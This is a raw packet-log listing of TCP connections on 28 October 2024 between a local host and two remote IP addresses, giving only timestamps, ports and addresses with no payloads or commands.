Oct 28, 2024 13:47:16.677061081 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.677119970 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.677134991 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.677139044 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.677175999 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.677194118 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.677478075 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.677527905 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.677604914 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.677664042 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.677742958 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.677793980 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.678136110 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.678194046 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.678694963 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.678756952 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.678878069 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.678929090 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.679122925 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.679173946 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.679970026 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.679976940 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.680002928 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.680032015 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.680037022 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.680089951 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.680089951 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.793709993 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.793726921 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.793796062 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.793803930 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.793833971 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.794287920 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.794302940 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.794363022 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.794368029 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.794487000 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.795169115 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.795183897 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.795239925 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.795244932 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.795435905 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.801078081 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.801094055 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.801141977 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.801146984 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.801182032 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.801193953 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.807207108 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.807224989 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.807269096 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.807272911 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.807307005 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.807318926 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.807996035 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.808011055 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.808058023 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.808062077 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.808089018 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.808104038 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.808772087 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.808789015 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.808826923 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.808831930 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:16.808861971 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:16.808881998 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.036802053 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.036811113 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.036849022 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.036889076 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.036902905 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.036938906 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.036961079 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.160041094 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.160056114 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.160187960 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.160196066 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.160238028 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.160665989 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.160682917 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.160748959 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.160754919 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.161952972 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.167231083 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.167237997 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.167304039 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.167309046 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.169451952 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.283246994 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.283263922 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.283358097 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.283368111 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.283399105 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.283417940 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.283910990 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.283926010 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.283968925 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.283973932 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.284002066 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.284020901 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.284616947 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.284635067 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.284683943 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.284689903 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.285523891 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.297192097 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.297209024 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.297252893 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.297257900 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.297286987 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.297306061 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.297857046 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.297872066 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.297935963 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.297945023 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.298089027 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.298612118 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.298629045 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.298676968 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.298681021 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.298733950 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.406625032 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.406651020 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.406804085 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.406831026 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.407157898 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.407181025 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.407224894 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.407231092 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.407249928 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.407284021 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.407843113 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.407860041 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.407937050 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.407942057 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.408425093 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.408447981 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.408490896 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.408497095 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.408545017 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.408572912 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.408989906 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.409014940 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.409089088 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.409095049 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.409588099 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.412924051 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.420178890 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.420195103 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.420257092 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.420260906 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.420295000 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.420312881 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.428209066 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.428225994 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.428451061 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.428456068 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.428761959 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.428787947 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.428834915 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.428839922 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.428864956 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.428894997 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.429330111 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.429344893 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.429404020 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.429409027 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.429456949 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.429816008 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.429832935 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.429887056 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.429892063 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.430759907 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.435650110 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.435667038 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.435724974 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.435729027 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.436233997 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.436253071 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.436290026 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.436295033 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.436320066 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.436345100 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.436899900 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.436917067 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.436973095 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.436978102 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.437454939 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.539499044 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.539518118 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.539704084 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.539719105 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.539767027 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.540005922 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.540039062 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.540102959 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.540107012 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.540517092 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.540544033 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.540582895 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.540591002 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.540610075 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.540635109 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.540927887 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.540932894 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.541004896 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.541007996 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.541496038 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.541515112 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.541558027 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.541563034 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.541585922 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.541613102 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.542057991 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.542072058 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.542130947 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.542135000 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.542604923 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.542623997 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.542658091 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.542664051 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.542691946 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.542715073 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.543031931 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.543045044 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.543100119 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.543102980 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.543448925 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.543550014 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.543575048 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.543610096 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.543615103 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.543638945 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.543647051 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.544301033 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.544320107 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.544369936 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.544382095 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.547466993 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.559705973 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.559721947 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.559905052 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.559910059 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.559954882 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.560252905 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.560272932 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.560318947 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.560322046 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.560353041 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.560370922 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.560789108 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.560810089 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.560866117 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.560870886 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.561201096 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.561219931 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.561268091 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.561273098 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.561295986 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.561320066 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.561698914 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.561712980 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.561770916 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.561774969 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.561968088 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.561986923 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.562040091 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.562046051 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.562443972 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.562454939 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.562515020 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.562520981 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.563043118 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.563066006 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.563102961 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.563108921 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.563119888 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.563153028 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.563416958 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.563429117 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.563477039 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.563481092 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.563522100 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.563550949 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.563978910 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.563992977 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.564045906 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.564052105 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.564055920 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.564100981 CET	443	49732	188.114.96.3	192.168.2.4
Oct 28, 2024 13:47:18.564137936 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.564137936 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.564167976 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.564167976 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:47:18.564713001 CET	49732	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:02.656940937 CET	49773	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:02.662368059 CET	80	49773	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:02.662650108 CET	49773	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:02.662909031 CET	49773	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:02.668243885 CET	80	49773	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:03.337872982 CET	80	49773	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:03.344742060 CET	49773	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:03.350125074 CET	80	49773	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:03.503777981 CET	80	49773	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:03.540091991 CET	49778	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:03.540134907 CET	443	49778	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:03.540198088 CET	49778	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:03.545861959 CET	49778	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:03.545901060 CET	443	49778	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:03.555387974 CET	49773	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:04.171524048 CET	443	49778	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:04.171612024 CET	49778	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:04.174437046 CET	49778	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:04.174448967 CET	443	49778	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:04.175025940 CET	443	49778	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:04.227250099 CET	49778	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:04.238415003 CET	49778	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:04.283333063 CET	443	49778	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:04.380553961 CET	443	49778	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:04.380696058 CET	443	49778	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:04.380770922 CET	49778	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:04.395613909 CET	49778	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:04.403263092 CET	49773	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:04.408891916 CET	80	49773	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:04.558504105 CET	80	49773	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:04.561161995 CET	49787	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:04.561192036 CET	443	49787	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:04.561273098 CET	49787	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:04.561503887 CET	49787	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:04.561512947 CET	443	49787	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:04.602257013 CET	49773	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:04.935435057 CET	49730	80	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:05.165647984 CET	443	49787	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:05.168245077 CET	49787	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:05.168260098 CET	443	49787	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:05.318583012 CET	443	49787	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:05.318715096 CET	443	49787	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:05.318845034 CET	49787	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:05.319238901 CET	49787	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:05.323256969 CET	49773	80	192.168.2.4	158.101.44.242
